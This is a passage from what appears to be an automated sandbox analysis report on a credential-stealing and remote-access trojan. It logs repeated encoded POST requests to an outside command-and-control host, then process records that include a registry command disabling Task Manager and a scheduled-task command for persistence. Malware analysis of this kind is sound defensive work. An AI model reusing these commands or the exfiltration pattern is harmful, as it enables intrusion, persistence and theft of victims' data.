                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:55.087687016 CET | 1796 | OUT | Data Raw: 50 56 58 50 5a 59 51 5a 55 5a 54 59 51 52 55 57 58 5d 5c 54 59 57 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXPZYQZUZTYQRUWX]\TYWR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/& (%Y%-5X=>40$=,4+$-'?3_/,?.7>#^!'^)
Jan 1, 2025 15:03:55.181049109 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:55.409064054 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:55.426397085 CET | 951 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJ6cqIjjPx1kb4Y3uFpOvU%2FmYeLsXb8f3LuwUGd56VX0TWkryBYgtjJBPRNnp4VFUuoFEx2fvZo7NmI%2FZ3ZtjjsBkS1wXaDZodCyz7f2yYoekeRFfP5ergBqohejYgETjk5YaapL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e359aa97289-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1926&rtt_var=724&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=758047&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 55 27 5d 27 58 29 2d 29 01 2f 11 2f 12 25 3f 04 15 33 30 30 5a 31 07 2a 00 2f 38 37 05 3f 2b 20 01 26 3a 2d 12 23 0f 2e 5c 26 0c 2e 5d 04 1d 26 02 3e 04 3e 59 3f 3f 25 5b 3e 54 28 58 27 09 2f 5b 24 27 24 5d 24 2d 29 05 21 21 3c 0b 27 55 2f 0b 3f 07 23 5f 33 2e 3e 12 21 2a 2e 57 0d 12 22 50 31 2e 1b 53 28 21 24 10 36 02 27 1e 25 2f 01 54 27 2f 30 1f 23 01 3e 1d 3d 06 33 04 36 34 35 56 30 3a 0d 5f 22 00 25 58 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"U']'X)-)//%?300Z1*/87?+ &:-#.\&.]&>>Y??%[>T(X'/[$'$]$-)!!<'U/?#_3.>!*.W"P1.S(!$6'%/T'/0#>=3645V0:_"%X#3"T /T=VO0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
144 | 192.168.2.4 | 50151 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:54.855104923 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:55.212651968 CET | 1064 | OUT | Data Raw: 55 53 5d 56 5f 5a 51 54 55 5a 54 59 51 5b 55 53 58 5a 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]V_ZQTUZTYQ[USXZ\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+78:&.%)>#^34:3!0$/='(-8R><#^!'^)?
Jan 1, 2025 15:03:55.408616066 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:55.519613981 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:55.572350979 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgMVtdlt80TAGHvCP2ulLqtVL5lZB81PmTMprWYHgqJppTvG7FuMBQd04IC3icgXjyMjXwbJV20XxRjyUMCuvhAJiRMNRp2NM2cukoZduUcmZg2%2BjvhwrCJI1S7Ii%2FSTVDbyDn7k"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e365dd37cf0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=1866&rtt_var=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=447852&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
145 | 192.168.2.4 | 50152 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:55.703027964 CET | 320 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
Jan 1, 2025 15:03:56.058305979 CET | 1072 | OUT | Data Raw: 55 56 58 51 5a 58 51 58 55 5a 54 59 51 5a 55 55 58 5e 5c 5e 59 57 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXQZXQXUZTYQZUUX^\^YWRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<4-%>1>=7Y'%,4<]%/3//?.4T=,#^!'^)#
Jan 1, 2025 15:03:56.147584915 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:56.421130896 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPMkN1MUwNmjDmptUabkzEtk5oXDAY%2FKt5yyJQt4LJt7keWLpFGvnpoBN6Lcofzfqn%2FU%2BW6%2BME4xS3ujt1m%2FViMeF504kZb7MBRDN8PuToPQVO2DNXJ0KeclMcDyVFwt2ujWm%2BJA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e3bae917ca5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2283&min_rtt=1911&rtt_var=1461&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=298629&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
146 | 192.168.2.4 | 50153 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:56.544367075 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:56.902704954 CET | 1072 | OUT | Data Raw: 55 52 5d 54 5a 5e 54 5f 55 5a 54 59 51 52 55 56 58 5b 5c 55 59 56 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]TZ^T_UZTYQRUVX[\UYVRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?548!Z&!\=,3$T,7;3?P$?;[;=.),#^!'^)
Jan 1, 2025 15:03:57.025768995 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:57.195359945 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pCtNWW%2FIGM2ucw%2B2YTq12uji9eK5mWNqqZZcnUSHfxc48KvTdi0x12ksRhAAGso5y5pWCnHfU51Ch01k%2BZcVdxOoyFUgw7BIZPTZ0LetnjvtoJp%2B5%2BLYvsFLcKb977xt8g3M1APA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e411bbac32c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3281&min_rtt=1725&rtt_var=3759&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=103005&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
147 | 192.168.2.4 | 50154 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:57.334589005 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:57.695137978 CET | 1072 | OUT | Data Raw: 55 51 5d 53 5a 5c 54 58 55 5a 54 59 51 5e 55 52 58 5d 5c 58 59 5c 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]SZ\TXUZTYQ^URX]\XY\R[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/#]2$.)>'$"._$)3;X,?*#^!'^)3
Jan 1, 2025 15:03:57.775382996 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:58.059123039 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iQvPP%2BK%2BZ%2FrR%2BXDEq5i2zmdBGUf2IscyJlXXy9gqK2qBz2vsIq1Kf7mQ%2BcmV8P2vSIIUzx9voBT68S3hPPc%2Bwg6WrW%2Fy9oiZc5bLSSqgsHRTPEWFWv8sQ8s3ZgHmkmMwz31C002B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e45cc0e424a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3200&min_rtt=1743&rtt_var=3569&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=108914&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
148 | 192.168.2.4 | 50155 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:58.252554893 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:58.603550911 CET | 1072 | OUT | Data Raw: 55 52 5d 56 5a 58 51 5b 55 5a 54 59 51 59 55 53 58 58 5c 59 59 50 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UR]VZXQ[UZTYQYUSXX\YYPR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?-4;:%>)X(.($%-B+$/%0<?;X ?.$=<#^!'^)/
Jan 1, 2025 15:03:58.711599112 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:58.961337090 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1lGWXvplnVRruZbkrkstldcSW3QCkNySKolez%2BjD46DZYh3MGmpmlumgpenMSPI8fIb7wk0PCwC%2BNNN6B86k9fdzxulNKxGAO1BzRoPGe81wGlplHzh%2FEOIIdtEbKsuMf8RN0o6G"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e4ba94b4240-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7033&min_rtt=1759&rtt_var=11209&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=33213&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
149 | 192.168.2.4 | 50156 | 104.21.38.84 | 80 | 7448 | C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 15:03:59.113854885 CET | 344 | OUT | POST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
Jan 1, 2025 15:03:59.462802887 CET | 1072 | OUT | Data Raw: 50 55 5d 54 5a 5e 54 5a 55 5a 54 59 51 5f 55 53 58 59 5c 54 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PU]TZ^TZUZTYQ_USXY\TYWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)<!\ +%[2=-($B&T.4($"V3<(;=4]<((,#^!'^)7
Jan 1, 2025 15:03:59.566910028 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 15:03:59.833519936 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQq8OdDg4rNDQZX5dW9bt8adT6jD1n1GqHh0DKY7LsL8CTIKzsUc%2FzbOBCfzJzZ7GwxR6sp3tTCVU9F1QrgZLkioogIgHeIGnNXeG2JoVpwVpaJeylTrL6d7WtFKWaHvHUCxDumO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e50f9c83354-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3910&min_rtt=1900&rtt_var=4732&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=81201&cwnd=113&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Target ID:0
                                                                                                                  Start time:09:01:56
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\Desktop\1znAXdPcM5.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\1znAXdPcM5.exe"
                                                                                                                  Imagebase:0x580000
                                                                                                                  File size:2'236'943 bytes
                                                                                                                  MD5 hash:E656DB3DEB4CF58570317E64607C5420
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669164420.0000000006D8A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1669786460.00000000056C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:1
                                                                                                                  Start time:09:01:56
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\jb23QgoxZwrgcyya3I3hQ2gDGXuWLnkOXZaTu.vbe"
                                                                                                                  Imagebase:0xfb0000
                                                                                                                  File size:147'456 bytes
                                                                                                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\ELi4IhX1eHmQ2UsaOienYgDzI4HKnyNJ9ZRwGYArPHIQTcsLe.bat" "
                                                                                                                  Imagebase:0x240000
                                                                                                                  File size:236'544 bytes
                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:3
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                                                                  Imagebase:0xe10000
                                                                                                                  File size:59'392 bytes
                                                                                                                  MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  Target ID:5
                                                                                                                  Start time:09:01:59
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\/Local/discord/surrogateWinMonitordll/Agentcomponentbrokermonitordhcp.exe"
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:1'914'880 bytes
                                                                                                                  MD5 hash:86AF92730370230540800E6D509E4155
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1700421210.00000000000B2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1748446594.00000000127DA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exe, Author: Joe Security
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 71%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Target ID:6
                                                                                                                  Start time:09:02:01
                                                                                                                  Start date:01/01/2025
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
